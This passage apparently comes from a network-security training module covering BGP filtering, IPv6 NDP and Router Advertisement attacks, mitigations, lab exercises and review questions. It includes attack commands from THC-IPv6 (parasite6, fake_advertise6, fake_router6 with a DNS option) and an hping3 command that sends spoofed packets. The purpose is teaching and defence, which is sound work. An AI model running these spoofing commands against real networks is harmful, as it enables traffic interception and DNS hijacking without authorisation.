route-map CUSTOMER-IN deny 100
!
router bgp 65001
 neighbor 10.0.0.1 route-map CUSTOMER-IN in
```
Maximum Prefix Limits:
```
! Protect against prefix explosion
router bgp 65001
 neighbor 10.0.0.1 maximum-prefix 100 warning-only
```
BGP TTL Security (GTSM):
```
! Only accept BGP from directly connected peers
router bgp 65001
 neighbor 10.0.0.1 ttl-security hops 1
```
IPv6-Specific Vulnerabilities
NDP Spoofing (IPv6 ARP Spoofing)
IPv6 uses Neighbor Discovery Protocol (NDP) instead of ARP. It has similar vulnerabilities.
NDP Spoofing:
```
IPv6 Neighbor Discovery:
  - Neighbor Solicitation (NS)  = ARP Request
  - Neighbor Advertisement (NA) = ARP Reply
  - Uses ICMPv6 (not a separate protocol like ARP)

ATTACK:
  Same as ARP spoofing but with ICMPv6 NA messages

  Victim  <---- Fake NA: "Gateway fe80::1 is at attacker-MAC" ----+
                                                                  |
  Gateway <---- Fake NA: "Victim fe80::2 is at attacker-MAC" -----+
                                                                  |
                                                              Attacker
```
Using THC-IPv6:
```bash
# Install THC-IPv6 toolkit
apt install thc-ipv6

# NDP spoofing (like arpspoof for IPv6)
sudo parasite6 eth0

# Or targeted
sudo fake_advertise6 eth0 <target-ipv6> <gateway-ipv6>
```
Router Advertisement Attacks
IPv6 hosts auto-configure using Router Advertisements (RA). Malicious RAs can hijack traffic.
RA Attack Scenarios:
```
ATTACK 1: FAKE DEFAULT ROUTER
-----------------------------
  Attacker sends RA: "I'm the default router"
  Victims: Update default gateway to attacker

ATTACK 2: SLAAC MANIPULATION
----------------------------
  Attacker sends RA with malicious prefix
  Victims: Auto-configure address in attacker's prefix

ATTACK 3: DNS HIJACKING VIA RA
------------------------------
  RA can include RDNSS option (DNS server)
  Attacker sends RA with malicious DNS
  Victims: Use attacker's DNS server
```
Using THC-IPv6:
```bash
# Become default router
sudo fake_router6 eth0 fe80::1

# With DNS hijacking
sudo fake_router6 eth0 fe80::1 -D <dns-server>
```
IPv6 Extension Header Abuse
IPv6 extension headers can evade security controls.
Extension Header Evasion:
```
IPv6 header chain:
+--------+--------+--------+---------+---------+
|  IPv6  | Hop-by | Routing| Fragment|   TCP   |
| Header |  -Hop  | Header | Header  | Header  |
+--------+--------+--------+---------+---------+
     |
     +-- Firewalls may not parse entire chain
         Headers can hide true destination/payload
```
IPv6 Mitigation
RA Guard (Cisco):
```
! Block rogue RAs on access ports
interface GigabitEthernet0/1
 switchport mode access
 ipv6 nd raguard

! Trust router port
interface GigabitEthernet0/24
 ipv6 nd raguard router
```
SEND (Secure NDP):
```
! Enable SEND (requires PKI)
ipv6 nd secured
```
Linux RA filtering:
```bash
# Ignore RAs on interface
echo 0 > /proc/sys/net/ipv6/conf/eth0/accept_ra

# Use firewall
ip6tables -A INPUT -p icmpv6 --icmpv6-type router-advertisement -j DROP
```
Lab Exercise: Network Layer Attack Chain
Objective
Demonstrate IP spoofing detection and BGP monitoring concepts.
Environment
Lab Network:
```
├── Attacker: Kali Linux (192.168.1.50)
├── Target: Ubuntu Server (192.168.1.100)
├── Router/Firewall: pfSense (192.168.1.1)
└── Monitoring: Security Onion or Wireshark
```
Exercise 1: IP Spoofing Detection
```bash
# On Attacker (Kali):
# Send spoofed packets
sudo hping3 -1 -a 192.168.1.200 192.168.1.100 -c 5

# On Target (capture):
sudo tcpdump -i eth0 icmp -nn

# Observe:   ICMP from 192.168.1.200 (which doesn't exist)
# Detection: Compare source IP against actual network assignments
```
Exercise 2: ICMP Redirect Observation
```bash
# Capture ICMP redirects
sudo tcpdump -i eth0 'icmp[icmptype] = 5' -nn -v

# Generate redirect (on router):
# Enable redirects and trigger with routing change

# Defense: Verify redirect acceptance is disabled (expect 0)
cat /proc/sys/net/ipv4/conf/all/accept_redirects
```
Exercise 3: BGP Monitoring Setup
```bash
# Install BGPalerter
npm install -g bgpalerter

# Create config for your prefixes
# Monitor for anomalies via RIPE RIS data stream

# Educational: Explore BGP data at
#   https://stat.ripe.net/
#   https://bgpstream.com/
```
Key Takeaways
- IP spoofing is trivial without egress filtering; ISPs should implement BCP 38
- ICMP attacks range from reconnaissance to DoS to traffic redirection; rate limit and filter appropriately
- BGP hijacking can redirect internet traffic globally; RPKI provides cryptographic validation
- IPv6 introduces new attack surfaces with NDP, RA, and extension headers; apply IPv6-specific security controls
- Defense requires multiple layers: filtering, monitoring, cryptographic validation, and proper configuration
Self-Assessment
- Comprehension: Why does longest-prefix-match make sub-prefix BGP hijacking so effective?
- Application: A host is receiving ICMP redirects changing its default gateway. How would you detect and prevent this?
- What if: Your organization's IP prefix appears in BGP from an unauthorized AS. What immediate steps would you take?
Review Questions
- What is IP spoofing and what attacks does it enable?
- How does ingress/egress filtering (BCP 38) prevent spoofing?
- Explain the difference between BGP hijacking and BGP interception.
- How does RPKI validate BGP route origins?
- What makes NDP spoofing similar to ARP spoofing?
- How can Router Advertisement attacks compromise IPv6 hosts?
MITRE ATT&CK Mapping
| Attack | Technique ID | Tactic |
|---|---|---|
| IP Spoofing | T1090.002 | Command and Control |
| ICMP Redirect | T1557 | Credential Access |
| BGP Hijacking | T1557 | Collection |
| IPv6 NDP Spoofing | T1557.002 | Credential Access |
| Fragmentation Evasion | T1027 | Defense Evasion |